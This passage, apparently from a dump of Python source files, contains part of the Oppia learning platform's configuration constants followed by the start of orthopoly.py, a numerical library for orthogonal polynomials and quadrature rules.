by\'\n\n# User id and username for exploration migration bot. 
Commits made by this bot\n# are not reflected in the exploration summary models, but are recorded in the\n# exploration commit log.\nMIGRATION_BOT_USER_ID = \'OppiaMigrationBot\'\nMIGRATION_BOT_USERNAME = \'OppiaMigrationBot\'\n\n# Ids and locations of the permitted extensions.\nALLOWED_RTE_EXTENSIONS = {\n \'Collapsible\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Collapsible\')\n },\n \'Image\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Image\')\n },\n \'Link\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Link\')\n },\n \'Math\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Math\')\n },\n \'Tabs\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Tabs\')\n },\n \'Video\': {\n \'dir\': os.path.join(RTE_EXTENSIONS_DIR, \'Video\')\n },\n}\n\n# These categories and interactions are displayed in the order in which they\n# appear in the interaction selector.\nALLOWED_INTERACTION_CATEGORIES = [{\n \'name\': \'General\',\n \'interaction_ids\': [\n \'Continue\',\n \'EndExploration\',\n \'ImageClickInput\',\n \'ItemSelectionInput\',\n \'MultipleChoiceInput\',\n \'TextInput\'\n ],\n}, {\n \'name\': \'Math\',\n \'interaction_ids\': [\n \'GraphInput\',\n \'LogicProof\',\n \'NumericInput\',\n \'SetInput\',\n \'MathExpressionInput\',\n ]\n}, {\n \'name\': \'Programming\',\n \'interaction_ids\': [\n \'CodeRepl\',\n \'PencilCodeEditor\',\n ],\n}, {\n \'name\': \'Music\',\n \'interaction_ids\': [\n \'MusicNotesInput\'\n ],\n}, {\n \'name\': \'Geography\',\n \'interaction_ids\': [\n \'InteractiveMap\'\n ],\n}]\n\nALLOWED_GADGETS = {\n \'ScoreBar\': {\n \'dir\': os.path.join(GADGETS_DIR, \'ScoreBar\')\n },\n}\n\n# Gadgets subclasses must specify a valid panel option from this list.\nALLOWED_GADGET_PANELS = [\'bottom\']\n\n# Demo explorations to load through the admin panel. The id assigned to each\n# exploration is based on the key of the exploration in this dict, so ensure it\n# doesn\'t change once it\'s in the list. Only integer-based indices should be\n# used in this list, as it maintains backward compatibility with how demo\n# explorations used to be assigned IDs. 
The value of each entry in this dict is\n# either a YAML file or a directory (depending on whether it ends in .yaml).\n# These explorations can be found under data/explorations.\nDEMO_EXPLORATIONS = {\n u\'0\': \'welcome.yaml\',\n u\'1\': \'multiples.yaml\',\n u\'2\': \'binary_search\',\n u\'3\': \'root_linear_coefficient_theorem.yaml\',\n u\'4\': \'three_balls\',\n # TODO(bhenning): Replace demo exploration \'5\' with a new exploration\n # described in #1376.\n u\'6\': \'boot_verbs.yaml\',\n u\'7\': \'hola.yaml\',\n u\'8\': \'adventure.yaml\',\n u\'9\': \'pitch_perfect.yaml\',\n u\'10\': \'test_interactions\',\n u\'11\': \'modeling_graphs\',\n u\'12\': \'protractor_test_1.yaml\',\n u\'13\': \'solar_system\',\n u\'14\': \'about_oppia.yaml\',\n u\'15\': \'classifier_demo_exploration.yaml\',\n u\'16\': \'all_interactions\',\n}\n\nDEMO_COLLECTIONS = {\n u\'0\': \'welcome_to_collections.yaml\'\n}\n\n# IDs of explorations which should not be displayable in either the learner or\n# editor views.\nDISABLED_EXPLORATION_IDS = [\'5\']\n\n# Google Group embed URL for the Forum page.\nEMBEDDED_GOOGLE_GROUP_URL = (\n \'https://groups.google.com/forum/embed/?place=forum/oppia\')\n\n# Whether to allow YAML file uploads.\nALLOW_YAML_FILE_UPLOAD = False\n\n# Prefix for all taskqueue-related URLs.\nTASKQUEUE_URL_PREFIX = \'/task\'\nTASK_URL_FEEDBACK_MESSAGE_EMAILS = (\n \'%s/email/batchfeedbackmessageemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_FEEDBACK_STATUS_EMAILS = (\n \'%s/email/feedbackthreadstatuschangeemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_FLAG_EXPLORATION_EMAILS = (\n \'%s/email/flagexplorationemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_INSTANT_FEEDBACK_EMAILS = (\n \'%s/email/instantfeedbackmessageemailhandler\' % TASKQUEUE_URL_PREFIX)\nTASK_URL_SUGGESTION_EMAILS = (\n \'%s/email/suggestionemailhandler\' % TASKQUEUE_URL_PREFIX)\n\n# TODO(sll): Add all other URLs here.\nADMIN_URL = \'/admin\'\nCOLLECTION_DATA_URL_PREFIX = \'/collection_handler/data\'\nEDITABLE_COLLECTION_DATA_URL_PREFIX = \'/collection_editor_handler/data\'\nCOLLECTION_RIGHTS_PREFIX = \'/collection_editor_handler/rights\'\nCOLLECTION_EDITOR_URL_PREFIX = \'/collection_editor/create\'\nCOLLECTION_URL_PREFIX = \'/collection\'\nDASHBOARD_URL = \'/dashboard\'\nDASHBOARD_CREATE_MODE_URL = \'%s?mode=create\' % DASHBOARD_URL\nDASHBOARD_DATA_URL = \'/dashboardhandler/data\'\nDASHBOARD_EXPLORATION_STATS_PREFIX = \'/dashboardhandler/explorationstats\'\nEDITOR_URL_PREFIX = \'/create\'\nEXPLORATION_DATA_PREFIX = \'/createhandler/data\'\nEXPLORATION_INIT_URL_PREFIX = \'/explorehandler/init\'\nEXPLORATION_METADATA_SEARCH_URL = \'/exploration/metadata_search\'\nEXPLORATION_RIGHTS_PREFIX = \'/createhandler/rights\'\nEXPLORATION_SUMMARIES_DATA_URL = \'/explorationsummarieshandler/data\'\nEXPLORATION_URL_PREFIX = \'/explore\'\nEXPLORATION_URL_EMBED_PREFIX = \'/embed/exploration\'\nFEEDBACK_STATS_URL_PREFIX = \'/feedbackstatshandler\'\nFEEDBACK_THREAD_URL_PREFIX = \'/threadhandler\'\nFEEDBACK_THREADLIST_URL_PREFIX = \'/threadlisthandler\'\nFEEDBACK_THREAD_VIEW_EVENT_URL = \'/feedbackhandler/thread_view_event\'\nFLAG_EXPLORATION_URL_PREFIX = \'/flagexplorationhandler\'\nLIBRARY_GROUP_DATA_URL = \'/librarygrouphandler\'\nLIBRARY_INDEX_URL = \'/library\'\nLIBRARY_INDEX_DATA_URL = \'/libraryindexhandler\'\nLIBRARY_RECENTLY_PUBLISHED_URL = \'/library/recently_published\'\nLIBRARY_SEARCH_URL = \'/search/find\'\nLIBRARY_SEARCH_DATA_URL = \'/searchhandler/data\'\nLIBRARY_TOP_RATED_URL = \'/library/top_rated\'\nNEW_COLLECTION_URL = 
\'/collection_editor_handler/create_new\'\nNEW_EXPLORATION_URL = \'/contributehandler/create_new\'\nRECENT_COMMITS_DATA_URL = \'/recentcommitshandler/recent_commits\'\nRECENT_FEEDBACK_MESSAGES_DATA_URL = \'/recent_feedback_messages\'\nROBOTS_TXT_URL = \'/robots.txt\'\nSITE_FEEDBACK_FORM_URL = \'\'\nSITE_LANGUAGE_DATA_URL = \'/save_site_language\'\nSIGNUP_DATA_URL = \'/signuphandler/data\'\nSIGNUP_URL = \'/signup\'\nSPLASH_URL = \'/splash\'\nSUGGESTION_ACTION_URL_PREFIX = \'/suggestionactionhandler\'\nSUGGESTION_LIST_URL_PREFIX = \'/suggestionlisthandler\'\nSUGGESTION_URL_PREFIX = \'/suggestionhandler\'\nUPLOAD_EXPLORATION_URL = \'/contributehandler/upload\'\nUSERNAME_CHECK_DATA_URL = \'/usernamehandler/data\'\n\nNAV_MODE_ABOUT = \'about\'\nNAV_MODE_BLOG = \'blog\'\nNAV_MODE_COLLECTION = \'collection\'\nNAV_MODE_CONTACT = \'contact\'\nNAV_MODE_CREATE = \'create\'\nNAV_MODE_DASHBOARD = \'dashboard\'\nNAV_MODE_DONATE = \'donate\'\nNAV_MODE_EXPLORE = \'explore\'\nNAV_MODE_LIBRARY = \'library\'\nNAV_MODE_PROFILE = \'profile\'\nNAV_MODE_SIGNUP = \'signup\'\nNAV_MODE_SPLASH = \'splash\'\nNAV_MODE_TEACH = \'teach\'\nNAV_MODE_THANKS = \'thanks\'\n\n# Event types.\nEVENT_TYPE_STATE_HIT = \'state_hit\'\nEVENT_TYPE_ANSWER_SUBMITTED = \'answer_submitted\'\nEVENT_TYPE_DEFAULT_ANSWER_RESOLVED = \'default_answer_resolved\'\nEVENT_TYPE_NEW_THREAD_CREATED = \'feedback_thread_created\'\nEVENT_TYPE_THREAD_STATUS_CHANGED = \'feedback_thread_status_changed\'\nEVENT_TYPE_RATE_EXPLORATION = \'rate_exploration\'\n# The values for these event types should be left as-is for backwards\n# compatibility.\nEVENT_TYPE_START_EXPLORATION = \'start\'\nEVENT_TYPE_MAYBE_LEAVE_EXPLORATION = \'leave\'\nEVENT_TYPE_COMPLETE_EXPLORATION = \'complete\'\n\nACTIVITY_STATUS_PRIVATE = \'private\'\nACTIVITY_STATUS_PUBLIC = \'public\'\nACTIVITY_STATUS_PUBLICIZED = \'publicized\'\n\n# Play type constants\nPLAY_TYPE_PLAYTEST = \'playtest\'\nPLAY_TYPE_NORMAL = \'normal\'\n\n# Predefined commit messages.\nCOMMIT_MESSAGE_EXPLORATION_DELETED = \'Exploration deleted.\'\nCOMMIT_MESSAGE_COLLECTION_DELETED = \'Collection deleted.\'\n\n# Unfinished features.\nSHOW_TRAINABLE_UNRESOLVED_ANSWERS = False\n# Number of unresolved answers to be displayed in the dashboard for each\n# exploration.\nTOP_UNRESOLVED_ANSWERS_COUNT_DASHBOARD = 3\n# Number of open feedback to be displayed in the dashboard for each exploration.\nOPEN_FEEDBACK_COUNT_DASHBOARD = 3\n# NOTE TO DEVELOPERS: This should be synchronized with base.js\nENABLE_STRING_CLASSIFIER = False\nSHOW_COLLECTION_NAVIGATION_TAB_HISTORY = False\nSHOW_COLLECTION_NAVIGATION_TAB_STATS = False\n\n# Output formats of downloaded explorations.\nOUTPUT_FORMAT_JSON = \'json\'\nOUTPUT_FORMAT_ZIP = \'zip\'\n\n# Types of updates shown in the \'recent updates\' table in the dashboard page.\nUPDATE_TYPE_EXPLORATION_COMMIT = \'exploration_commit\'\nUPDATE_TYPE_COLLECTION_COMMIT = \'collection_commit\'\nUPDATE_TYPE_FEEDBACK_MESSAGE = \'feedback_thread\'\n\n# Possible values for user query status.\n# Valid status transitions are: processing --> completed --> archived\n# Or processing --> failed.\nUSER_QUERY_STATUS_PROCESSING = \'processing\'\nUSER_QUERY_STATUS_COMPLETED = \'completed\'\nUSER_QUERY_STATUS_ARCHIVED = \'archived\'\nUSER_QUERY_STATUS_FAILED = \'failed\'\n\n# The time difference between which to consider two login events ""close"". 
This\n# is taken to be 12 hours.\nPROXIMAL_TIMEDELTA_SECS = 12 * 60 * 60\n\nDEFAULT_COLOR = \'#a33f40\'\nDEFAULT_THUMBNAIL_ICON = \'Lightbulb\'\n\n# List of supported default categories. For now, each category has a specific\n# color associated with it. Each category also has a thumbnail icon whose\n# filename is ""{{CategoryName}}.svg"".\nCATEGORIES_TO_COLORS = {\n \'Mathematics\': \'#cd672b\',\n \'Algebra\': \'#cd672b\',\n \'Arithmetic\': \'#d68453\',\n \'Calculus\': \'#b86330\',\n \'Logic\': \'#d68453\',\n \'Combinatorics\': \'#cf5935\',\n \'Graph Theory\': \'#cf5935\',\n \'Probability\': \'#cf5935\',\n \'Statistics\': \'#cd672b\',\n \'Geometry\': \'#d46949\',\n \'Trigonometry\': \'#d46949\',\n\n \'Algorithms\': \'#d0982a\',\n \'Computing\': \'#bb8b2f\',\n \'Programming\': \'#d9aa53\',\n\n \'Astronomy\': \'#879d6c\',\n \'Biology\': \'#97a766\',\n \'Chemistry\': \'#aab883\',\n \'Engineering\': \'#8b9862\',\n \'Environment\': \'#aba86d\',\n \'Medicine\': \'#97a766\',\n \'Physics\': \'#879d6c\',\n\n \'Architecture\': \'#6e3466\',\n \'Art\': \'#895a83\',\n \'Music\': \'#6a3862\',\n \'Philosophy\': \'#613968\',\n \'Poetry\': \'#7f507f\',\n\n \'English\': \'#193a69\',\n \'Languages\': \'#1b4174\',\n \'Latin\': \'#3d5a89\',\n \'Reading\': \'#193a69\',\n \'Spanish\': \'#405185\',\n \'Gaulish\': \'#1b4174\',\n\n \'Business\': \'#387163\',\n \'Economics\': \'#5d8b7f\',\n \'Geography\': \'#3c6d62\',\n \'Government\': \'#538270\',\n \'History\': \'#3d6b52\',\n \'Law\': \'#538270\',\n\n \'Education\': \'#942e20\',\n \'Puzzles\': \'#a8554a\',\n \'Sport\': \'#893327\',\n \'Welcome\': \'#992a2b\',\n}\n\n# Types of activities that can be created with Oppia.\nACTIVITY_TYPE_EXPLORATION = \'exploration\'\nACTIVITY_TYPE_COLLECTION = \'collection\'\nALL_ACTIVITY_TYPES = [ACTIVITY_TYPE_EXPLORATION, ACTIVITY_TYPE_COLLECTION]\n\n# A sorted list of default categories for which icons and background colours\n# exist.\nALL_CATEGORIES = sorted(CATEGORIES_TO_COLORS.keys())\n\n# These categories are shown in the library navbar.\nSEARCH_DROPDOWN_CATEGORIES = sorted([\n \'Mathematics\',\n \'Statistics\',\n \'Algorithms\',\n \'Programming\',\n \'Biology\',\n \'Chemistry\',\n \'Physics\',\n \'Medicine\',\n \'English\',\n \'Architecture\',\n \'Art\',\n \'Music\',\n \'Reading\',\n \'Business\',\n \'Economics\',\n \'Geography\',\n \'History\',\n])\n\n# The i18n id for the header of the ""Featured Activities"" category in the\n# library index page.\nLIBRARY_CATEGORY_FEATURED_ACTIVITIES = \'I18N_LIBRARY_GROUPS_FEATURED_ACTIVITIES\'\n# The i18n id for the header of the ""Top Rated Explorations"" category in the\n# library index page.\nLIBRARY_CATEGORY_TOP_RATED_EXPLORATIONS = (\n \'I18N_LIBRARY_GROUPS_TOP_RATED_EXPLORATIONS\')\n# The i18n id for the header of the ""Recently Published"" category in the\n# library index page.\nLIBRARY_CATEGORY_RECENTLY_PUBLISHED = \'I18N_LIBRARY_GROUPS_RECENTLY_PUBLISHED\'\n\n# The group name that appears at the end of the url for the recently published\n# page.\nLIBRARY_GROUP_RECENTLY_PUBLISHED = \'recently_published\'\n# The group name that appears at the end of the url for the top rated page.\nLIBRARY_GROUP_TOP_RATED = \'top_rated\'\n\n# NOTE TO DEVELOPERS: The LIBRARY_PAGE_MODE constants defined below should have\n# the same value as the ones defined in LIBRARY_PAGE_MODES in Library.js. 
For\n# example LIBRARY_PAGE_MODE_GROUP should have the same value as\n# LIBRARY_PAGE_MODES.GROUP.\n# Page mode for the group pages such as top rated and recently published\n# explorations.\nLIBRARY_PAGE_MODE_GROUP = \'group\'\n# Page mode for the main library page.\nLIBRARY_PAGE_MODE_INDEX = \'index\'\n# Page mode for the search results page.\nLIBRARY_PAGE_MODE_SEARCH = \'search\'\n\n# List of supported language codes. Each description has a\n# parenthetical part that may be stripped out to give a shorter\n# description.\nALL_LANGUAGE_CODES = [{\n \'code\': \'en\', \'description\': u\'English\',\n}, {\n \'code\': \'ar\', \'description\': u\'العربية (Arabic)\',\n}, {\n \'code\': \'bg\', \'description\': u\'български (Bulgarian)\',\n}, {\n \'code\': \'ca\', \'description\': u\'català (Catalan)\',\n}, {\n \'code\': \'zh\', \'description\': u\'中文 (Chinese)\',\n}, {\n \'code\': \'hr\', \'description\': u\'hrvatski (Croatian)\',\n}, {\n \'code\': \'cs\', \'description\': u\'čeština (Czech)\',\n}, {\n \'code\': \'da\', \'description\': u\'dansk (Danish)\',\n}, {\n \'code\': \'nl\', \'description\': u\'Nederlands (Dutch)\',\n}, {\n \'code\': \'tl\', \'description\': u\'Filipino (Filipino)\',\n}, {\n \'code\': \'fi\', \'description\': u\'suomi (Finnish)\',\n}, {\n \'code\': \'fr\', \'description\': u\'français (French)\',\n}, {\n \'code\': \'de\', \'description\': u\'Deutsch (German)\',\n}, {\n \'code\': \'el\', \'description\': u\'ελληνικά (Greek)\',\n}, {\n \'code\': \'he\', \'description\': u\'עברית (Hebrew)\',\n}, {\n \'code\': \'hi\', \'description\': u\'हिन्दी (Hindi)\',\n}, {\n \'code\': \'hu\', \'description\': u\'magyar (Hungarian)\',\n}, {\n \'code\': \'id\', \'description\': u\'Bahasa Indonesia (Indonesian)\',\n}, {\n \'code\': \'it\', \'description\': u\'italiano (Italian)\',\n}, {\n \'code\': \'ja\', \'description\': u\'日本語 (Japanese)\',\n}, {\n \'code\': \'ko\', \'description\': u\'한국어 (Korean)\',\n}, {\n \'code\': \'lv\', \'description\': u\'latviešu (Latvian)\',\n}, {\n \'code\': \'lt\', \'description\': u\'lietuvių (Lithuanian)\',\n}, {\n \'code\': \'no\', \'description\': u\'Norsk (Norwegian)\',\n}, {\n \'code\': \'fa\', \'description\': u\'فارسی (Persian)\',\n}, {\n \'code\': \'pl\', \'description\': u\'polski (Polish)\',\n}, {\n \'code\': \'pt\', \'description\': u\'português (Portuguese)\',\n}, {\n \'code\': \'ro\', \'description\': u\'română (Romanian)\',\n}, {\n \'code\': \'ru\', \'description\': u\'русский (Russian)\',\n}, {\n \'code\': \'sr\', \'description\': u\'српски (Serbian)\',\n}, {\n \'code\': \'sk\', \'description\': u\'slovenčina (Slovak)\',\n}, {\n \'code\': \'sl\', \'description\': u\'slovenščina (Slovenian)\',\n}, {\n \'code\': \'es\', \'description\': u\'español (Spanish)\',\n}, {\n \'code\': \'sv\', \'description\': u\'svenska (Swedish)\',\n}, {\n \'code\': \'th\', \'description\': u\'ภาษาไทย (Thai)\',\n}, {\n \'code\': \'tr\', \'description\': u\'Türkçe (Turkish)\',\n}, {\n \'code\': \'uk\', \'description\': u\'українська (Ukrainian)\',\n}, {\n \'code\': \'vi\', \'description\': u\'Tiếng Việt (Vietnamese)\',\n}]\n\n# Defaults for topic similarities\nDEFAULT_TOPIC_SIMILARITY = 0.5\nSAME_TOPIC_SIMILARITY = 1.0\n\n# NOTE TO DEVELOPERS: While adding another language, please ensure that the\n# languages are in alphabetical order.\nSUPPORTED_SITE_LANGUAGES = [{\n \'id\': \'id\',\n \'text\': \'Bahasa Indonesia\'\n}, {\n \'id\': \'en\',\n \'text\': \'English\'\n}, {\n \'id\': \'es\',\n \'text\': \'Español\'\n}, {\n \'id\': \'pt\',\n \'text\': \'Português\'\n}, {\n 
\'id\': \'pt-br\',\n \'text\': \'Português (Brasil)\'\n}, {\n \'id\': \'vi\',\n \'text\': \'Tiếng Việt\'\n}, {\n \'id\': \'hi\',\n \'text\': \'हिन्दी\'\n}]\nSYSTEM_USERNAMES = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]\nSYSTEM_USER_IDS = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]\n\n# The following are all page descriptions for the meta tag.\nABOUT_PAGE_DESCRIPTION = (\n \'Oppia is an open source learning platform that connects a community of \'\n \'teachers and learners. You can use this site to create 1-1 learning \'\n \'scenarios for others.\')\nBLOG_PAGE_DESCRIPTION = (\n \'Keep up to date with Oppia news and updates via our blog.\')\nCONTACT_PAGE_DESCRIPTION = (\n \'Contact the Oppia team, submit feedback, and learn how to get involved \'\n \'with the Oppia project.\')\nCREATE_PAGE_DESCRIPTION = (\n \'Help others learn new things. Create lessons through explorations and \'\n \'share your knowledge with the community.\')\nDASHBOARD_PAGE_DESCRIPTION = (\n \'Keep track of the lessons you have created, as well as feedback from \'\n \'learners.\')\nDONATE_PAGE_DESCRIPTION = (\n \'Donate to The Oppia Foundation.\')\nFORUM_PAGE_DESCRIPTION = (\n \'Engage with the Oppia community by discussing questions, bugs and \'\n \'explorations in the forum.\')\nLIBRARY_GROUP_PAGE_DESCRIPTION = (\n \'Discover top-rated or recently-published explorations on Oppia. Learn \'\n \'from these explorations or help improve an existing one for the \'\n \'community.\')\nLIBRARY_PAGE_DESCRIPTION = (\n \'Looking to learn something new? Find explorations created by professors, \'\n \'teachers and Oppia users in a subject you\\\'re interested in, and start \'\n \'exploring!\')\nPREFERENCES_PAGE_DESCRIPTION = (\n \'Change your Oppia profile settings and preferences\')\nSEARCH_PAGE_DESCRIPTION = (\n \'Discover a new exploration to learn from, or help improve an existing \'\n \'one for the community.\')\nSIGNUP_PAGE_DESCRIPTION = (\n \'Sign up for Oppia and begin exploring a new subject.\')\nSPLASH_PAGE_DESCRIPTION = (\n \'Oppia is a free site for sharing knowledge via interactive lessons \'\n \'called \\\'explorations\\\'. Learn from user-created explorations, or teach \'\n \'and create your own.\')\nTEACH_PAGE_DESCRIPTION = (\n \'The Oppia library is full of user-created lessons called \\\'explorations\\\'.\'\n \' Read about how to participate in the community and begin creating \'\n \'explorations.\')\nTERMS_PAGE_DESCRIPTION = (\n \'Oppia is a 501(c)(3) registered non-profit open-source e-learning \'\n \'platform. 
Learn about our terms and conditions for creating and \'\n \'distributing learning material.\')\nTHANKS_PAGE_DESCRIPTION = (\n \'Thank you for donating to The Oppia Foundation.\')\nSITE_NAME = \'Oppia.org\'\n\n# The type of the response returned by a handler when an exception is raised.\nHANDLER_TYPE_HTML = \'html\'\nHANDLER_TYPE_JSON = \'json\'\n', '""""""\n orthopoly.py - A suite of functions for generating orthogonal polynomials\n and quadrature rules.\n\n Copyright (c) 2014 Greg von Winckel\n All rights reserved.\n\n Permission is hereby granted, free of charge, to any person obtaining\n a copy of this software and associated documentation files (the\n ""Software""), to deal in the Software without restriction, including\n without limitation the rights to use, copy, modify, merge, publish,\n distribute, sublicense, and/or sell copies of the Software, and to\n permit persons to whom the Software is furnished to do so, subject to\n the following conditions:\n\n The above copyright notice and this permission notice shall be\n included in all copies or substantial portions of the Software.\n\n THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,\n EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n Last updated on Wed Jan 1 14:29:25 MST 2014\n\n Modified by David A. Ham (dummy@email.com), 2016\n""""""\n\nimport numpy as np\nfrom functools import reduce\nfrom math import gamma\n\n\ndef gauss(alpha, beta):\n """"""\n Compute the Gauss nodes and weights from the recursion\n coefficients associated with a set of orthogonal polynomials\n\n Inputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Outputs:\n x - quadrature nodes\n w - quadrature weights\n\n Adapted from the MATLAB code by Walter Gautschi\n http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m\n """"""\n\n from numpy.linalg import eigh\n\n A = np.diag(np.sqrt(beta)[1:], 1) + np.diag(alpha)\n x, V = eigh(A, ""U"")\n\n w = beta[0] * np.real(np.power(V[0, :], 2))\n return x, w\n\n\ndef lobatto(alpha, beta, xl1, xl2):\n """"""\n Compute the Lobatto nodes and weights with the preassigned\n nodea xl1,xl2\n\n Inputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n xl1 - assigned node location\n xl2 - assigned node location\n\n Outputs:\n x - quadrature nodes\n w - quadrature weights\n\n Based on the section 7 of the paper\n ""Some modified matrix eigenvalue problems""\n by Gene Golub, SIAM Review Vol 15, No. 
2, April 1973, pp.318--334\n """"""\n from numpy.linalg import solve\n n = len(alpha) - 1\n en = np.zeros(n)\n en[-1] = 1\n A1 = np.vstack((np.sqrt(beta), alpha - xl1))\n J1 = np.diag(A1[0, 1:-1], 1) + np.diag(A1[1, 1:]) + np.diag(A1[0, 1:-1], -1)\n A2 = np.vstack((np.sqrt(beta), alpha - xl2))\n J2 = np.diag(A2[0, 1:-1], 1) + np.diag(A2[1, 1:]) + np.diag(A2[0, 1:-1], -1)\n g1 = solve(J1, en)\n g2 = solve(J2, en)\n C = np.array(((1, -g1[-1]), (1, -g2[-1])))\n xl = np.array((xl1, xl2))\n ab = solve(C, xl)\n\n alphal = alpha\n alphal[-1] = ab[0]\n betal = beta\n betal[-1] = ab[1]\n x, w = gauss(alphal, betal)\n return x, w\n\n\ndef rec_jacobi(N, a, b):\n """"""\n Generate the recursion coefficients alpha_k, beta_k\n\n P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)\n\n for the Jacobi polynomials which are orthogonal on [-1,1]\n with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b]\n\n Inputs:\n N - polynomial order\n a - weight parameter\n b - weight parameter\n\n Outputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Adapted from the MATLAB code by Dirk Laurie and Walter Gautschi\n http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m\n """"""\n\n nu = (b - a) / float(a + b + 2)\n mu = 2 ** (a + b + 1) * gamma(a + 1) * gamma(b + 1) / gamma(a + b + 2)\n\n if N == 1:\n alpha = nu\n beta = mu\n else:\n n = np.arange(1.0, N)\n nab = 2 * n + a + b\n alpha = np.hstack((nu, (b ** 2 - a ** 2) / (nab * (nab + 2))))\n n = n[1:]\n nab = nab[1:]\n B1 = 4 * (a + 1) * (b + 1) / float((a + b + 2) ** 2 * (a + b + 3))\n B = 4 * (n + a) * (n + b) * n * (n + a + b) / \\\n (nab ** 2 * (nab + 1) * (nab - 1))\n beta = np.hstack((mu, B1, B))\n\n return alpha, beta\n\n\ndef rec_jacobi01(N, a, b):\n """"""\n Generate the recursion coefficients alpha_k, beta_k\n for the Jacobi polynomials which are orthogonal on [0,1]\n\n See rec_jacobi for the recursion coefficients on [-1,1]\n\n Inputs:\n N - polynomial order\n a - weight parameter\n b - weight parameter\n\n Outputs:\n alpha - recursion coefficients\n beta - recursion coefficients\n\n Adapted from the MATLAB implementation:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m\n\n """"""\n\n if a <= -1 or b <= -1:\n raise ValueError(\'\'\'Jacobi coefficients are defined only\n for alpha,beta > -1\'\'\')\n\n if not isinstance(N, int):\n raise TypeError(\'N must be an integer\')\n\n if N < 1:\n raise ValueError(\'N must be at least 1\')\n\n c, d = rec_jacobi(N, a, b)\n\n alpha = (1 + c) / 2\n beta = d / 4\n beta[0] = d[0] / 2 ** (a + b + 1)\n\n return alpha, beta\n\n\ndef polyval(alpha, beta, x):\n """"""\n Evaluate polynomials on x given the recursion coefficients alpha and beta\n """"""\n\n N = len(alpha)\n m = len(x)\n P = np.zeros((m, N + 1))\n\n P[:, 0] = 1\n P[:, 1] = (x - alpha[0]) * P[:, 0]\n\n for k in range(1, N):\n P[:, k + 1] = (x - alpha[k]) * P[:, k] - beta[k] * P[:, k - 1]\n\n return P\n\n\ndef jacobi(N, a, b, x, NOPT=1):\n """"""\n JACOBI computes the Jacobi polynomials which are orthogonal on [-1,1]\n with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them\n on the given grid up to P_N(x). 
Setting NOPT=2 returns the\n L2-normalized polynomials\n """"""\n\n m = len(x)\n P = np.zeros((m, N + 1))\n\n apb = a + b\n a1 = a - 1\n b1 = b - 1\n c = apb * (a - b)\n\n P[:, 0] = 1\n\n if N > 0:\n P[:, 1] = 0.5 * (a - b + (apb + 2) * x)\n\n if N > 1:\n for k in range(2, N + 1):\n k2 = 2 * k\n g = k2 + apb\n g1 = g - 1\n g2 = g - 2\n d = 2.0 * (k + a1) * (k + b1) * g\n P[:, k] = (g1 * (c + g2 * g * x) * P[:, k - 1] -\n d * P[:, k - 2]) / (k2 * (k + apb) * g2)\n\n if NOPT == 2:\n k = np.arange(N + 1)\n pnorm = 2 ** (apb + 1) * gamma(k + a + 1) * gamma(k + b + 1) / \\\n ((2 * k + a + b + 1) * (gamma(k + 1) * gamma(k + a + b + 1)))\n P *= 1 / np.sqrt(pnorm)\n return P\n\n\ndef jacobiD(N, a, b, x, NOPT=1):\n """"""\n JACOBID computes the first derivatives of the normalized Jacobi\n polynomials which are orthogonal on [-1,1] with respect\n to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them\n on the given grid up to P_N(x). Setting NOPT=2 returns\n the derivatives of the L2-normalized polynomials\n """"""\n\n z = np.zeros((len(x), 1))\n if N == 0:\n Px = z\n else:\n\n Px = 0.5 * np.hstack((z, jacobi(N - 1, a + 1, b + 1, x, NOPT) *\n ((a + b + 2 + np.arange(N)))))\n return Px\n\n\ndef mm_log(N, a):\n """"""\n MM_LOG Modified moments for a logarithmic weight function.\n\n The call mm=MM_LOG(n,a) computes the first n modified moments of the\n logarithmic weight function w(t)=t^a log(1/t) on [0,1] relative to\n shifted Legendre polynomials.\n\n REFERENCE: Walter Gautschi,``On the preceding paper `A Legendre\n polynomial integral\' by James L. Blue\'\',\n Math. Comp. 33 (1979), 742-743.\n\n Adapted from the MATLAB implementation:\n https://www.cs.purdue.edu/archives/2002/wxg/codes/mm_log.m\n """"""\n\n if a <= -1:\n raise ValueError(\'Parameter a must be greater than -1\')\n\n prod = lambda z: reduce(lambda x, y: x * y, z, 1)\n\n mm = np.zeros(N)\n\n c = 1\n for n in range(N):\n if isinstance(a, int) and a < n:\n\n p = range(n - a, n + a + 2)\n mm[n] = (-1) ** (n - a) / prod(p)\n mm[n] *= gamma(a + 1) ** 2\n\n else:\n if n == 0:\n mm[0] = 1 / (a + 1) ** 2\n else:\n k = np.arange(1, n + 1)\n s = 1 / (a + 1 + k) - 1 / (a + 1 - k)\n p = (a + 1 - k) / (a + 1 + k)\n mm[n] = (1 / (a + 1) + sum(s)) * prod(p) / (a + 1)\n\n mm[n] *= c\n c *= 0.5 * (n + 1) / (2 * n + 1)\n\n return mm\n\n\ndef mod_chebyshev(N, mom, alpham, betam):\n """"""\n Calcuate the recursion coefficients for the orthogonal polynomials\n which are are orthogonal with respect to a weight function which is\n represented in 